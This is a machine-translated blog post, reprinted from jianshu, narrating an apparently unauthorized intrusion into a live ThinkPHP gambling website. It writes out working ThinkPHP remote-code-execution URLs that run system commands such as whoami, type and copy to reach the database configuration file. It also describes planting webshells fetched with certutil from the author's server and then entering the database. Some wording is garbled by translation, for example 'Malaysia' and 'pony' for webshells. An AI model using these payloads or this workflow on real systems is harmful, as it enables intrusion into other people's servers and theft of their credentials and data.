Title: A penetration test for a certain spinach website

I accidentally discovered a thinkphp spinach site. Didn’t there be a loophole in TP recently?

Then I tested it casually, but the process was not very smooth, but I finally won it, so I posted this article to share my ideas.

0x00 One-click getshell

After a brief look, there should be many people playing, right?

Just a few days ago, I wrote a test tool and took it out to test it first.

The tool shows a vulnerability

One-click getshell, it looks very smooth, haha.

But. Xiao Ming shook his hair and found that things were not simple.

When the kitchen knife is connected, an error of 500 is returned.

We used Firefox's hackbar to verify it. There is nothing wrong with it, so why can't the kitchen knife be connected?

As a stingy person, I couldn't help but fall into deep thought.

0x01 Start analysis

Because I wrote this tool myself, I found from the picture of getshell above that the third exp is called, so let's analyze it and take a look.

Poc as follows

/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir

Let's enter whoami after the poc to see the permissions.

/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami

iis permission

However, some commands can be executed, such as echo dir, etc.

0x02 Try to break through the shell

Since we can execute echo, we can try writing a pony. If it succeeds, we will use the pony to upload the pony to do it and do it as soon as we say it. When the hard work comes, we have to write it in line by line.

Note: Symbols in the code should be escaped with ^^. For example ?php escaped to ^^?php

After the line-by-line writing is completed, I found that it cannot run normally when accessing it. I forgot to take a screenshot here.

Next, I tried to download the file to the server using the following method and failed.

Just when I was about to give up, I remembered that there was still a download command that was useless.

That's certutil.exe

Just do it, put Malaysia on our server and enable HFS.

Then execute the following command.

successfully entered Malaysia, but don’t be too happy too early.

Xiao Ming shook his hair again and found that things were even more difficult.

Malaysia can operate file upload and change its name, etc. but it cannot edit the file, cannot view the file source code, etc. click to display a blank space.

Since that's the case, let's go into the database and take a look.

We all know that the database configuration file of TP is in the following location

/application/database.php

Malaysia cannot be opened, so we can use the tp command to execute the vulnerability and try to use the type command to read this file.

/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=typec:\www\application\database.php

The attempt to read type failed, and then the copy command came to mind.

Copy database.php to the web root directory and change the name to 1.txt

/?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=copyc:\www\application\database.php c:\www\public\1.txt

After copying, visit url/1.txt and find that it is empty.

0x03 Successful breakthrough

After experiencing a series of failures, I calmed down and thought, and we can also try to read the source code using file_path.

Use Dama to upload this file to the root directory, then access it, and successfully obtain the database configuration information.

Then fill in the configuration information and enter the database.

It was already late at night when this article was written. I looked at the instant noodles I had eaten half of my instant noodles on the table, and finally drank two sips of soup, turned off the phone, and went to bed.

Reprinted from the original link: https://www.jianshu.com/p/1f9b02780f1c